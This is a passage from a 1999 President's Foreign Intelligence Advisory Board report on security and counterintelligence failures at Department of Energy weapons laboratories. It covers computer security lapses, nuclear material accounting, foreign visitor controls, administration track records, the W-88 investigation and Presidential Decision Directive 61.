included a lack of management plans, inadequate access controls, and failures to test for compliance with security procedures.33
As a 1996 DOE report to the President said, “adversaries no longer have to scale a fence, defeat sensors, or bypass armed guards to steal nuclear or leading–edge
‘know-how’ or to shut down our critical infrastructure. They merely have to defeat the less ominous obstacles of cyber–defense.”34
_____________________________________
Computer systems at some DOE
facilities were so easy to access that
even Department analysts likened them
to “automatic teller machines, [allowing]
unauthorized withdrawals at our
nation’s expense.”
DOE’s cyber–defenses were, in fact, found to be “less ominous obstacles.” In 1994, an internal DOE review found that despite security improvement “users of
unclassified computers continue to compromise classified information due to ongoing inadequacies in user awareness training, adherence to procedures, enforcement
of security policies, and DOE and [lab] line management oversight.”35 Also in 1994, a report to the Energy Secretary cited five areas of concern: “failure to properly
accredit systems processing classified information, lack of controls to provide access authorities and proper password management; no configuration management;
improper labeling of magnetic media; and failure to perform management reviews.”36
Apparently, the warnings were to no avail. A year later, the annual report to the Secretary noted: “Overall, findings and surveys, much like last year, continue to
reflect deficiencies in self–inspections and procedural requirements or inappropriate or inadequate site guidance … In the area of classified matter protection and
control, like last year, marking, accountability, protection, and storage deficiencies are most numerous.”37
Some reports made extra efforts to puncture through the fog of bureaucratic language. A 1995 report to the President said: “By placing sensitive information on
information systems, we increase the likelihood that inimicable interests, external and internal, will treat those systems as virtual automatic teller machines, making
unauthorized withdrawals at our nation’s expenses.” Indeed, a report found security breaches at one of the major weapons facility in which documents with
unclassified but sensitive information “were found to be stored on systems that were readily accessible to anyone with Internet access.”38 In other instances,
personnel were found to be sending classified information to outsiders via an unclassified email system.39
Ahead of its Time
In 1986, the DOE Office of Safeguards and Quality Assessment issued an inspection report on a weapons lab that warned of shortcomings in computer
security and noted that the “ability of [a] user to deliberately declassify a classified file without detection and move classified information from the secure
partition to the open partition can be made available to any authorized user either on or off site.”40
The warning turned out to be on the mark. In April of this year, Energy Secretary Bill Richardson issued a statement: “While I cannot comment on the specifics,
I can confirm that classified nuclear weapons computer codes at Los Alamos were transferred to an unclassified computer system. This kind of egregious
security breach is absolutely unacceptable ... .”
Even though the hard evidence points to only sporadic penetrations of the labs by foreign intelligence services (see classified appendix), volumes of sensitive and
classified information may have been lost over the years—via discarded or purloined documents; uninformed and often improperly vetted employees, and a maze of
uncontrolled computer links. In one recent case discovered by PFIAB, lab officials initially refused to rectify a security vulnerability because “no probability is
assigned to [a loss of sensitive information], just the allegation that it is possible.”41
As recent as last year’s annual DOE report to the President, security analysts were finding “numerous incidents of classified information being placed on unclassified
systems, including several since the development of a corrective action plan in July 1998.”42
TRACKING OF NUCLEAR MATERIALS: HOW MUCH MUF?
MUF stands for “materials unaccounted for,” the official term used until the late 1970s for discrepancies in the amount of nuclear materials that can be physically
located in inventory versus the amount noted in Department records. MUF (now termed with the more politic phrase “inventory differences”) has been a recurring
concern—and debate—in the nuclear research field since the beginning. The question at the center of the debate: if large quantities of nuclear material are impossible
to measure with absolute precision, what constitutes a significant loss?
As in many questions, the answer depends on whom you ask. Officials of nuclear research facilities have argued that the scale and complexity of the processing and
handling of nuclear material inevitably result in losses that are detectable but inconsequential. Outside observers have tended to be less sanguine about what
constitutes a significant loss from a security standpoint.
In 1976, the General Accounting Office reported that the Nuclear Regulatory Commission and the Energy Research and Development Administration (DOE’s
predecessor) could not account for 8,000 pounds of highly enriched uranium and plutonium. Officials of the two agencies responded that part of the accounting
discrepancy could be ascribed to the statistical margin of error in their measuring equipment, the rest was probably dregs created during processing and left in
machinery parts, wiping cloths, and scrap items.43
Critics of the agencies have pointed out that thieves could easily use the variance in statistical measures to cover their tracks, stealing an increment during each
measuring period that falls just within the margin of error. They have also pointed out that if Department records are not accurate, it is impossible for anyone to
estimate the stock of nuclear material at any given point, much less the difference between two levels as it proceeds from one stage of the nuclear cycle to the next.
In December 1994, the Department released updated figures for the cumulative amount of MUF or inventory difference for the 50-year period beginning in 1944.
The cumulative figure: 6,174 pounds. Of that amount, a cumulative total of about 10 pounds was ascribed to “accidental losses” and “approved write-offs.”44
GAO has continued to highlight the issue since DOE has become the steward of the nation’s nuclear weapons laboratories. GAO published a report in 1991
criticizing the insufficiency of the Department’s measuring systems and handling procedures45 ; in 1994, criticizing its methods of tracking exported nuclear material;46
and in 1995, for installing a new system that was allegedly faulty.47
Even if accurate systems of measurement and accounting had been in place, it is not clear whether DOE officials would have been qualified to manage them
effectively. A 1995 report to the President warned that “severe budget reductions, diminished technical resources, increased responsibilities, and reduced mission
training ... have undermined protection of special nuclear material and restricted data.”48
Last year, a report by an external review panel found “a lack of nuclear physical security expertise at all levels in the oversight process; ad hoc structuring of
safeguards and security functions throughout the Department, and placement of oversight functions in positions which constrain their effectiveness.”49
The dispute over the accuracy of nuclear measurements, of course, is beyond the technical capabilities of this panel to resolve. But the panel members do believe that
its persistence and the low priority given to the issue relative to other DOE scientific goals is indicative of the insti-tutional attitude that DOE has had toward security:
nonscientists have a poor understanding of all things nuclear, so their judgments about acceptable levels of risk are suspect prima facie.
FOREIGN VISITORS AND ASSIGNMENTS PROGRAM
True to the tradition of international partnership molded by the experiences of the Manhattan Project, the weapons labs have remained a reservoir of the best
international scientific talent. Recent examples abound: a supercomputing team from Oak Ridge National Lab, made up of three PRC citizens and a Hungarian,
recently won the Gordon Bell Prize; a Bulgarian and a Canadian, both world-class scientists, are helping Lawrence Livermore National Lab solve problems in fluid
dynamics; a Spanish scientist, also at Livermore, is collaborating with colleagues on laser propagation.
But for more than a decade, the increasing prominence of foreign visitors in the weapons labs has increased concern about security risks. The PFIAB panel found
that as early as 1985, the DCI raised concerns about the foreign visitors’ program with the Energy Secretary. A year later, researchers conducting internal DOE
review could find only scant data on the number and composition of foreign nationals at the weapons labs. Although intelligence officials drafted suggestions for
DOE’s foreign visitor control program, PFIAB found little evidence of reform efforts until the tenure of Secretary Watkins.
A 1988 GAO report cited DOE for failing “to obtain timely and adequate information on foreign visitors before allowing them access to the laboratories.” The GAO
found three cases where DOE allowed visitors with questionable backgrounds—possible foreign agents—access to the labs. In addition, the GAO found that about
10 percent of 637 visitors from sensitive countries were associated with foreign organizations suspected of conducting nuclear weapons activities but DOE did not
request background data on them prior to their visit. DOE also had not conducted its own review of the visit and assignment program at the weapons labs despite
the DOE requirement to conduct audits or reviews at a minimum of every five years. Moreover, GAO reported that few post–visit or host reports required by DOE
Order 12402 were submitted within 30 days of the visitors’ departure and some were never completed.50
The following year, DOE revised its foreign visitor policy and commissioned an external study on the extent and significance of the foreign visitor problem. DOE’s
effort to track and vet visitors, however, still lagged well behind the expansion of the visitor program, allowing foreigners with suspicious backgrounds to gain access
to weapons facilities. A study published in June 1990 indicated DOE had a “crippling lack of essential data, most notably no centralized, retrievable listing of foreign
national visitors to government facilities.”51
By September, 1992, DOE had instituted Visitor Assignment Management System (VAMS) databases, used to track visitors and assignees requesting to visit DOE.
The system, however, failed to provide links between the labs that could be used for CI analysis and cross-checking of prospective visitors. Moreover, labs
frequently did not even use the database and failed to enter visitor information. Instead, each lab developed its own computer program independently.
Reviews of security determined that, despite an increase of more than 50 percent in foreign visits to the labs from the mid–1980s to the mid–1990s, DOE controls
on foreign visitors actually weakened in two critical areas: screening for visitors that may pose security risks, and monitoring the content of discussions that might
touch on classified information.
In 1994, DOE headquarters delegated greater authority to approve nonsensitive country visitors to the laboratories, approving a partial exception for Los Alamos
and Sandia National Laboratories to forego background checks to help “reduce costs and processing backlogs.” This resulted in almost automatic approval of some
foreign visitors and fewer background checks. The FBI and GAO subsequently found that “questionable visitors, including suspected foreign intelligence agents, had
access to the laboratories without DOE and/or laboratory officials’ advance knowledge of the visitors’ backgrounds.”52
Changes in records checks over the past decade also made it easier for individuals from sensitive countries to gain access to the laboratories. In 1988, for example,
all visitors from Communist countries required records checks regardless of the purpose of the visit. By 1996, records checks were only required for visitors from
sensitive countries who visited secure areas or discussed sensitive subjects.
An internal DOE task force in 1996 determined that the Department’s definitions of sensitive topics were not specific enough to be useful. It directed the DOE office
of intelligence to develop a new methodology for defining sensitive topics, but did not set a due date. The 1996 group also called for a Deputy Secretary–level
review of foreign visits and assignments to be completed by June 1997.53 The PFIAB panel found no evidence to suggest that these tasks were accomplished.
In 1997, GAO found that DOE lacked clear criteria for identifying visits that involve sensitive subjects, U.S. scientists may have discussed sensitive subjects with
foreign nationals without DOE’s knowledge or approval; and the Department’s counterintelligence program had failed to produce comprehensive threat assessments
that would identify likely facilities, technologies, and programs targeted by foreign intelligence.54 The study found that records checks were still not being conducted
regularly on foreign visitors from sensitive countries.55 Last year, 7,600 foreign scientists paid visits to the weapons labs.56 Of that total, about 34 percent were from
countries that are designated “sensitive” by the Department of Energy—meaning they represent a hostile intelligence threat. The GAO reported last year that foreign
nationals had been allowed after-hours and unescorted access to buildings.57
Administration Track Records
CARTER
(Schlesinger: Aug '77-Aug '79; Duncan: Aug '79-Jan '81)
'77 DOE established … First visiting U.S. scientists to China in '79 and '80 face Chinese elicitation effort. …Late 1970s FBI investigates possible espionage
at a lab. …'80 GAO reports on problems safeguarding against the spread of nuclear weapons technology.
REAGAN I
(Edwards: Jan '81-Nov '82; Hodel: Nov '82-Feb '85; Herrington: Feb '85- )
'82 DOE's Inspection and Evaluation program formed …GAO reports safeguards and security of weapons labs not adequate, recommends independent
assessments program. …'83 DOE issues threat guidance to provide a “consistent basis" for identifying vulnerabilities. …Memo to DOE, DOD states President
has "decided to strengthen WH role … concerning the security of U.S. nuclear facilities."… President signs National Security Decision Directive (NSDD) on
DOE security. … DOE Safeguards and Security Steering Group formed at President's direction to oversee fulfillment of physical security improvements …
GAO reports security concerns at Rocky Flats facility. … DOE conducts eight internal security inspections at weapons facilities and DOE HQ; provides
criticisms and recommendations to DOE management. … '84 DOE's Central Training Academy established for protective force personnel.
REAGAN II
(Herrington: Feb '85-Jan '89)
'86 Rep. Dingell letter to President re: lab security vulnerabilities, management problems and lack of confidence in DOE. … Four GAO reports on DOE
security and CI problems … External report requested by DOE finds problems with management of foreign visitors and adequate security. …'87 Three GAO
reports on DOE highlight the transfer of technology to proliferating nations and inefficient security clearance program. …Seven internal DOE security
inspections criticize management and security practices in '87-'88. …DOE initiates the Personnel Security Assurance Program (PSAP) … DOE focuses on
insider protection and strengthens classified document controls. …Three DOE IG reports about security clearance problems from '86-'88. …'88 Intelligence
Community paper reflects concerns with international scientific exchanges at the DOE labs. … President signs NSDD on Nuclear Weapons Safety, Security,
and Control. … FBI detailee to DOE cites inaccessibility to senior DOE managers. …President states "Improved nuclear security is an important legacy for us
to leave the next administration;" DOE official opines that Energy has done "essentially all that can be done against the outsider threat." … Senate Intelligence
Committee staff briefed on CI activities at labs. … Four GAO reports address DOE security and counter-intelligence problems, including: major weaknesses in
foreign visitor controls at labs, and foreign agents possibly gaining access to labs.
BUSH
(Watkins: Mar '89-Jan '93)
'89 New Secretary concerned about 1988 GAO criticism of DOE CI/security, defers DOE annual report on security until he reviews issue; NSC concurs. …
GAO finds insufficient control over weapons-related information and technology. …'90 Four IG reports on security … Secretary of Energy Advisory Board
(SEAB) chartered … Interagency CI group prepares assessment of intelligence threat to government facilities from visiting foreign nationals. …GAO cites lack
of clear, concise physical security standards and inconsistent material measurements at labs. … Freeze Task Force critical of split management of classified and
unclassified computer security; finds direction, coordination, conduct and oversight of safeguards and security activities throughout DOE warrant structural
changes. …External CI review highlights DOE's inability to manage comprehensive approach to foreign threat; inadequate oversight, control over secret
document inventory; uncoordinated computer security responsibilities. …'91 Four IG reports criticize security…GAO reports property, classified document
control problems at LLNL; 10,000 documents unaccounted; inability of DOE to track, monitor, and correct security deficiencies … '87, '89, and '91 GAO
reports foreign countries routinely obtaining unclassified but sensitive information that could assist nuclear programs. …Memo to President highlights previous
security problems at DOE, Secretary's efforts to fix the deficiencies. …'92 Two IG reports on security…SSCI-requested CI assessment finds DOE
headquarters lacks authority to direct labs, CI resources, and current threat information. …GAO cites weak internal security oversight controls; incomplete
safeguards and security planning at DOE facilities. …DOE Order on CI issued. …DOE and FBI formalize relationship for conduct of CI activities. …Internal
security report to Secretary finds "personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements." …
Another report finds "Problems in management and oversight represent the most significant weakness" for the Department…and "security systems continue to
be plagued with potential single point failures."
ASSESSMENTS
RESPONSIBILITY
While cultural, structural, and historical problems have all figured into the management and security and counterintelligence failures of DOE, they should not be
construed as an excuse for the deplorable irresponsibility within the agency, the pattern of inaction from those charged with implementation of policies, or the
inconsistency of those in leadership positions. The panel identified numerous instances in which individuals were presented with glaring problems yet responded with
foot–dragging, finger–pointing, bland reassurances, obfuscations, and even misrepresentations.
The record of inattention and “false start” reforms goes back to the beginning of DOE. There have been several Presidents; National Security Advisors, Energy
Secretaries, Deputy Secretaries, Assistant Secretaries, and Lab Directors; scores of DOE Office Directors and Lab managers; and a multitude of Energy
Department bureaucrats and Lab scientists who all must shoulder the responsibility and accountability.
As noted above, severe lapses in the security of the nation’s most critical technology, data, and materials were manifest at the creation of the DOE more than 20
years ago. Many, if not most, of the problems were identified repeatedly. Still, reforms flagged amid a lack of discipline and accountability. The fact that virtually
every one of those problems persisted—indeed, many of the problems still exist—indicates a lack of sufficient attention by every President, Energy Secretary, and
Congress.
This determination is in no way a capitulation to the standard of “everyone is responsible, therefore no one is responsible.” Quite the contrary. Even a casual reading
of the open–source reports on the Department’s problems presents one with a compelling narrative of incompetency that should have merited the aggressive action
of the nation’s leadership. Few transgressions could violate the national trust more than inattention to one’s direct responsibility for controlling the technology of
weapons of mass destruction.
The PFIAB panel was not empowered, nor was it charged, to make determinations of whether specific acts of espionage or malfeasance occurred regarding alleged
security lapses at the weapons labs. Nor was it tasked to issue performance appraisals of the various Presidents, Energy Secretaries, or members of the
Congressional leadership during their respective terms in office. However, an inquiry into the extent to which the system of administrative accountability and
responsibility broke down at various times in history has been necessary to fulfill our charter. In fairness, we have tried to examine the nature of the security problems
at DOE’s weapons labs in many respects and at many levels, ranging from the circumstances of individuals and the dynamics of group behavior to the effectiveness
of mid–level management, the clarity of the laws and regulations affecting the Department, and the effectiveness of leadership initiatives.
THE RECORD OF THE CLINTON TEAM
To its credit, in the past two years the Clinton Administration has proposed and begun to implement some of the most far–reaching reforms in DOE’s history. The
1998 Presidential Decision Directive on DOE counterintelligence (PDD-61) and Secretary Richardson’s initiatives are both substantial and positive steps. We offer
an analysis of some of these initiatives, and their likelihood of success, elsewhere in this chapter and elsewhere in this report.
However, the speed and sweep of the Administration’s ongoing response does not absolve it of its responsibility in years past. At the outset of the Clinton
Administration—in 1993, when it inherited responsibility for DOE and the glaring record of mismanagement of the weapons laboratories—the incoming leadership
did not give the security and counterintelligence problems at the labs the priority and attention they warranted. It will be incumbent on the DOE transition team for the
incoming administration in 2001 to pay particular heed to these issues.
While the track record of previous administrations’ responses to DOE’s problems is mixed (see box on previous administrations, on pp. 26-27), the panel members
believe that the gravity of the security and counterintelligence mismanagement at the Department will, and should, overshadow post facto claims of due diligence by
any administration—including the current one. Asserting that the degree of failure or success with DOE from one administration to the next is relative is, one might
say, gilding a figleaf.
The fact is that each successive administration had more evidence of DOE’s systemic failures in hand: the Reagan Administration arrived to find several years’ worth
of troubling evidence from the Carter, Ford, and Nixon years; the evidence had mounted higher by the time that the Bush Administration took over; and higher still
when the Clinton Administration came in. The Clinton Administration has acted forcefully, but it took pressure from below and outside the Administration to get the
attention of the leadership, and there is some evidence to raise questions about whether its actions came later than they should have, given the course of events that
led the recent flurry of activity.
Clinton Administration Track Record
O’Leary: Jan ’93–Jan ’97
’93 New Secretary works to make labs more open…launches major declassification effort. … DOE ’92 Annual Report to President does not mention
security problems highlighted same year in reports to Secretary .… GAO criticizes DOE’s ineffective management of personnel security cases. …Four IG
reports on security…Internal report to Secretary on computer security uncovers lack of access controls; no configuration management; failure to perform
management reviews. …’94 Three IG reports on security…FBI detailees to DOE recalled because of “lack of control of the CI program by DOE HQ.”
…Internal report finds classified and unclassified information on lab computer network. …GAO reports computer security deficiencies found in 1985 at six
facilities still not fixed. …’95 Four IG reports on security…Congress considers numerous bills between ’95–’99 to abolish DOE. … “Galvin Task Force”
offers SEAB options for change within the labs. … “Walk-in” provides documents containing sensitive U.S. nuclear information. …DOE officials meet with
FBI regarding potential espionage involving nuclear weapons data. …Analysis group formed at DOE to review Chinese weapons program; senior DOE, CIA,
White House officials discuss options. … GAO reports on poor management of nuclear material tracking capabilities …Laboratory Operations (oversight)
Board created. …’96 First three lab-to-lab exchanges between U.S. and China. …Internal DOE report discovers required nuclear material physical
inventories not being performed. … Two IG reports on security…DOE Deputy Secretary directs six “initiatives” to lab directors and field office heads for the
foreign visitors and CI programs (most initiatives ignored after he leaves DOE in 1997.)
Pena: Mar ’97–Jun ’98
’97 Mar New Secretary confirmed. … FBI report to Congress and DOE critical of DOE CI capabilities; addresses CI program oversight, foreign visits and
assignments, CI analysis, professional training/CI awareness. … FBI Director personally delivers CI review to Secretary. …Two additional Lab–to–Lab
exchanges held in Beijing. … DOE staff briefs Congressional staff, and NSC, CIA, FBI senior officials on Chinese nuclear program, possible Chinese
espionage before Secretary informed…DOE increases budget for CI in FY 1997, hires more CI professionals. …Inter-agency Working Group reports that
systemic and serious CI and security problems at DOE have been well documented over at least a ten year period … few of the recommendations in the past
studies have been implemented, … A senior CI official states “There is every reason to believe the labs will resist” any outside assistance … National Security
Advisor requests independent assessment of China's nuclear program and the impact of U.S. nuclear information. …Two DOE internal reports cite confusing,
fragmented, dysfunctional security management structure. …External report finds multiple, uncoordinated internal and external oversight activities. …DCI and
FBI Director meet with Secretary to discuss DOE CI problem and reform plan; … meeting notes state “Despite all the studies conducted, experience over time
has shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” … Internal DOE report states “in all candor, we have been
hampered in meeting [the safeguards and security] obligations by organizational obstacles and competing internal interests.” … PDD–61 drafted, coordinated in
inter-agency process. …DOE’s Laboratory Operations Board finds “inefficiencies due to the Department's complicated management structure.” …Peter Lee
(formerly of LLNL) pleads guilty, inter alia, to transmitting classified national defense information to representatives of the PRC in ’85. …GAO finds faulty
procedures for foreign visitor indices checks and controlling dissemination of sensitive information; lack of clear criteria for identifying visits that involve sensitive
subjects; indirect and inconsistent CI funding; DOE CI programs not based on comprehensive assessment of foreign espionage threat. …Institute of Defense
Analyses’ “120 Day Report” finds inadequate management of DOE workforce and confusing chains of com-mand. …’98 Feb. President signs PDD-61.
…External report says DOE management and oversight of security problematic …Security Management Board created by Congress, meets twice in next 18
months…CIA/FBI report provided to Congress on Chinese espionage activities. … Jun 30 Secretary resigns, Deputy designated as Acting Secretary. …
DOE’s 90-day report on CI reveals problems remain regarding separate management of classified and unclassified information. …Lab-to-lab exchange held in
Beijing.
Richardson: Aug ’98 –
’98 Aug 18 New Secretary sworn in …GAO again finds problems in DOE’s foreign visitor program; notes lack of clear procedures for identifying sensitive
subjects. …External report highlights lack of DOE oversight expertise and ad hoc security structure. … Per PDD–61, assessment of the foreign collection
threat against DOE published. …'99 DOE security review finds “unhealthy, adversarial environment of mistrust among DOE security organizations,”
recommends several management process changes …Cox Committee publishes report…Lab-to-Lab exchange held in Beijing. …President directs PFIAB to
review security, CI at labs; directs Intelligence Community to conduct damage assessment of possible security breaches at labs; directs CI community to review
security of nuclear weapons information in USG. …DOE CI Implementation Plan delivered to Secretary. …GAO reports inadequate separation of classified
and unclassified computer networks at same lab in 1988, 1992, 1994, and 1998. … “Chiles Report” describes management problems in nuclear weapons
program. …Internal DOE report highlights computer security problems at a lab. … DOE counterintelligence implementation plan (per PDD–61) issued to labs.
… DOE shuts down all classified computers at LANL, LLNL, and SNL. … DOE holds tri-lab computer security conference. … Secretary announces new
security organization at DOE, to be headed by a “security czar.”
THE 1995 ‘WALK-IN’ DOCUMENT
In 1995, a U.S. intelligence agency obtained information that has come to be called the “walk-in” document. A copy of a classified PRC report, it contains a
discussion of various U.S. nuclear warheads. The PFIAB has carefully reviewed this document, related information, and the circumstances surrounding its delivery.
Serious questions remain as to when it was written, why it was written, and why it was provided to the U.S. We need not resolve these questions.
The document unquestionably contains some information that is still highly sensitive, including descriptions, in varying degrees of specificity, of technical
characteristics of seven U.S. thermonuclear warheads. This information had been widely available within the U.S. nuclear weapons community, including the
weapons labs, other parts of DOE, the Department of Defense, and private contractors, for more than a decade. For example, key technical information concerning
the W–88 warhead had been available to numerous U.S. government and military entities since at least 1983 and could well have come from many organizations
other than the weapons labs.
W-88 INVESTIGATION
Despite the disclosure of information concerning seven warheads, despite the potential that the source or sources of these disclosures were other than the bomb
designers at the national weapons labs, and despite the potential that the disclosures occurred as early as 1982, only one investigation was initiated. That investigation
focused on only one warhead, the W–88, only one category of potential sources—bomb designers at the national labs—and on only a four-year window of
opportunity. It should have been pursued in a more comprehensive manner. The allegations raised in the investigation should still be pursued vigorously. And the
inquiry should be fully explored—regardless of the conclusions that may result.
The episode began as an administrative inquiry conducted by the DOE Office of Energy Intelligence, with limited assistance from the FBI. It developed into an FBI
investigation, which is still under way today. Allegations concerning this case and related activities high-lighted the need for improvements in the DOE’s
counterintelligence program, led along the way to the issuance of a Presidential Decision Directive revamping the DOE’s counterintelligence program, formed a
substantial part of the information underlying the Cox Committee’s conclusions on nuclear weapons information, and ultimately led, at least in part, to the President’s
decision to ask this Board to evaluate security and counterintelligence at the DOE’s weapons labs.
It is not within the mandate of our review to solve the W–88 case or any other potential compromises of nuclear weapons information. Further, it is not within our
mandate to conduct a comprehensive and conclusive evaluation of the handling of the W–88 investigation by the DOJ and FBI. In fact, as we understand it, that is
the purpose of a task force recently appointed by the Attorney General. We trust that among the issues that the task force will resolve are:
Whether the FBI committed sufficient resources, including agents with appropriate expertise, and demonstrated a sense of urgency commensurate with
an apparent compromise of classified U.S. nuclear weapons information;
Whether the DOJ Office of Intelligence Policy Review (OIPR) applied an inappropriately high standard to the FBI’s request for electronic surveillance
under the Foreign Intelligence Surveillance Act (FISA);
Whether the FBI provided to DOJ OIPR all U.S. government information relevant to an appropriate evaluation of the FBI’s FISA request;
Why the FBI’s FISA request did not include a request to monitor or search the subject’s workplace computer systems, particularly since an attorney in
the FBI’s General Counsel Office had provided an opinion in 1996 that such monitoring or searching in this case would require FISA authorization;
Why the FBI did not learn until recently that in 1995 the subject had executed a series of waivers authorizing monitoring of his workplace computer
systems;
Whether the FBI adequately raised to the Attorney General the FBI’s concerns over the declination of the FISA request;
Whether communications regarding the subject’s job tenure broke down between DOE, FBI, and Los Alamos;
Whether the DOJ OIPR maintained appropriate records concerning FISA requests that were declined;
Whether the FBI appropriately relied on technical opinions provided by the DOE;
Why DOE, rather than the FBI, conducted the first polygraph examination in this case when the case was an open FBI investigation; and, perhaps most
importantly,
Whether additional cases should be opened to investigate whether the apparent disclosures may have arisen out of organizations other than Los Alamos
lab.
Again, resolving these issues is not within our mandate. It is, however, explicitly within our mandate to identify additional steps that may need to be taken to address
the security and counterintelligence threats to the weapons labs. Also, it is within our standing PFIAB obligation under Executive Order 12863 to assess the
adequacy of counterintelligence activities beyond the labs. In this regard, what we have learned from our limited review of the W-88 case and other cases are
significant lessons that extend well beyond these particular cases. These lessons relate directly to additional steps we believe must be taken to strengthen our
safeguards against current security and foreign intelligence threats. Those steps are discussed further in the Classified Appendix to this report.
We have learned, for example, that under the current personnel security clearance system a person who is under FBI investigation for suspected counterintelligence
activities may sometimes be granted a new or renewed clearance. We also have learned that although the written standards for granting a first clearance and for
renewing an existing clearance may be identical, the actual practice that has developed—certainly within DOE and we strongly suspect elsewhere—is that clearance
renewals will be granted on a lower standard. We find such inconsistency unacceptable. We think it appropriate for the National Security Council to review and
resolve these issues.
We have also learned that the legal weapons designed to fight the counterintelligence battles of the 70s have not necessarily been rigorously adapted to fight the
counterintelligence battles of the 90s (and beyond). For example, with the passage of more than twenty years since the enactment of the Foreign Intelligence
Surveillance Act (FISA) of 1978, it may no longer be adequate to address the counterintelligence threats of the new millennium. We take no position on whether the
statute itself needs to be changed. It may well still be sufficient. However, based on all of the information we have reviewed and the interviews we have conducted,
and without expressing a view as to the appropriateness of the DOJ decision in the W–88 case, we do believe that the Department of Justice may be applying the
FISA in a manner that is too restrictive, particularly in light of the evolution of a very sophisticated counterintelligence threat and the ongoing revolution in information
systems. We also are concerned by the lack of uniform application across the government of various other investigative tools, such as employee waivers that grant
officials appropriate authority to monitor sensitive government computer systems.
Moreover, there does not exist today a systematic process to ensure that the competing interests of law enforcement and national security are appropriately
balanced. Law enforcement, rightly so, is committed to building prosecutable cases. This goal is often furthered by leaving an espionage suspect in place to facilitate
the gathering of more evidence. The national security interest, in contrast, is often furthered by immediately removing a suspect from access to sensitive information to
avoid additional compromises. Striking the proper balance is never easy. It is made all the more difficult when there is no regular process to ensure that balance is
struck. We have learned in our review that this difficult decision often is made by officials who either are too focused on the investigative details or are too unaware
of the details to make a balanced decision. This is another matter deserving National Security Council attention.
PFIAB EVALUATION OF THE INTELLIGENCE
COMMUNITY DAMAGE ASSESSMENT
Following receipt of the “walk-in” document, CIA, DOE, Congress, and others conducted numerous analyses in an effort to determine the extent of the classified
nuclear weapons information the PRC has acquired and the resultant threat to U.S. national security. Opinions expressed in the media and elsewhere have ranged
from one extreme to the other. On one end of the spectrum is the view that the Chinese have acquired very little classified information and can do little with it. On the
other end is the view that the Chinese have nearly duplicated the W–88 warhead.
After reviewing the available intelligence and interviewing the major participants in many of these studies, we conclude that none of these extreme views holds water.
For us, the most accurate assessment of China’s acquisition of classified U.S. nuclear weapons information and the resultant threat to U.S. national security is
presented in the April 1999 Intelligence Community Damage Assessment. Written by a team of experts, this assessment was reviewed and endorsed by an
independent panel of national security and nuclear weapons specialists, chaired by Admiral David Jeremiah. We substantially agree with the assessment’s analysis
and endorse its key findings. The full text of the assessment’s unclassified summary appears in the unclassified appendix.
PRESIDENTIAL DECISION DIRECTIVE 61: BIRTH AND INTENT
In mid–1997, it became clear to an increasingly broader range of senior administration officials that DOE’s counterintelligence program was in serious trouble.1 In
late July, DOE officials briefed the President’s National Security Advisor, who concluded that, while the real magnitude and national security implications of the
suspected espionage needed closer scrutiny, there was nonetheless a solid basis for taking steps to strengthen counterintelligence measures at the labs. He requested
an independent CIA assessment of China’s nuclear program and the impact of U.S. nuclear information, and he directed that the National Counterintelligence Policy
Board (NACIPB)2 review the DOE counterintelligence program. That September, the National Security Advisor received the CIA assessment, and the NACIPB
reported back that it had found “systemic and serious CI and security problems at DOE [had] been well documented over at least a ten year period” and “few of the
recommendations in the past studies [had] been implemented.” The NACIPB made 25 recommendations to significantly restructure the DOE CI program; it also
proposed that a Presidential Decision Directive or Executive Order be handed down to effect these changes.
At an October 15 meeting, the Director of Central Intelligence and the FBI Director discussed with Secretary Pena and his Deputy Secretary the need to reform the
DOE CI program. The DCI and FBI Director sought to make clear there was an urgent need to act immediately, and “despite all the studies conducted, experience
over time [had] shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” All agreed to develop an action plan that would serve
as the basis for a Presidential Decision Directive. Several senior officials involved felt that the necessary reforms would—without the mandate of a Presidential
directive—have little hope of overcoming the anticipated bureaucratic resistance, both at DOE headquarters and at the labs. There was a clear fear that, “if the
Secretary spoke, the bureaucracy wouldn’t listen; if the President spoke, the bureaucracy might at least listen.”
That winter, the NSC coordinated a draft PDD between and among the many agencies and departments involved. Serious disagreements arose over several issues,
particularly the creation of independent reporting lines to the Secretary for the Intelligence and Counterintelligence Offices. Also at issue was the subordination of the
CI officers at the labs. Much of the resistance stemmed simply from individuals interested in preserving their turf won in previous DOE bureaucratic battles. After
much bureaucratic maneuvering and even vicious in–fighting, these issues were finally resolved, or so it seemed; and on February 11, 1998, the President signed and
issued the directive as PDD-61.
The full PDD remains classified. An unclassified summary, which contains all significant provisions, is set forth in the unclassified annex. In our view, among the most
significant of the 13 initiatives directed by PDD-61 are:
The CI and foreign intelligence (FI) elements would be reconfigured into two independent offices and report directly to the Secretary of Energy;
The Director of the new Office of CI (OCI) would be a senior executive from the FBI and would have direct access to the Secretary of Energy, the
DCI and the Director of the FBI;
Existing DOE contracts with the labs would be amended to include CI program goals and objectives and performance measures to evaluate
compliance with these contractual obligations, and CI personnel assigned to the labs would have direct access to the lab directors and would
concurrently report to the Director, OCI;
The incoming Director, OCI would prepare a report for the Secretary of Energy ninety days after his arrival that would address progress on the
initiative, a strategic plan for achieving long-term goals, and recommendations on whether and to what extent other organizational changes may be
necessary to strengthen CI; and,
Within 120 days, the Secretary of Energy would advise the Assistant to the President for National Security Affairs on the actions taken and specific
remedies designed to implement this directive.
On April 1, 1998, a senior executive from the FBI assumed his duties as the Director of the OCI, and began his 90–day study. He completed and forwarded it to
the Secretary of Energy on July 1, the day after Secretary Pena resigned. The Acting Secretary led a review of the study and its recommendations. On August 18,
Secretary Richardson was sworn in. On November 13, he submitted the action plan required by the PDD to the National Security Advisor. Secretary Richardson
continued to develop an implementation plan. The completed implementation plan was delivered to Secretary Richardson on February 3, 1999, and issued to the
labs on March 4.
TIMELINESS OF PDD–61
Criticism has been raised that the PDD took too long to be issued and has taken too long to implement. Although the current National Security Advisor was briefed
on counterintelligence concerns by DOE officials in April of 1996, we are not convinced that the briefing provided a sufficient basis to require initiation of a broad
Presidential directive at that time. We are convinced, however, that the July 1997 briefing, which we are persuaded was much more comprehensive, was sufficient to
warrant aggressive White House action. We believe that while the resulting PDD was developed and issued within a customary amount of time, these issues had such
national security gravity that it should have been handled with more dispatch. That there were disagreements over various issues is not surprising; that the DOE
bureaucracy dug in its heels so deeply in resisting clearly needed reform is very disturbing. In fact, we believe that the NACIPB, created by PDD in 1994, was a
critical factor in ram–rodding the PDD through to signature. Before 1994, there was no real structure or effective process for handling these kinds of issues in a
methodical way. Had the new structure not been in place and working, we doubt if the PDD would have made it.
With regard to timeliness of implementation, we have far greater concern. It is not unreasonable to expect that senior DOE officials would require some time to
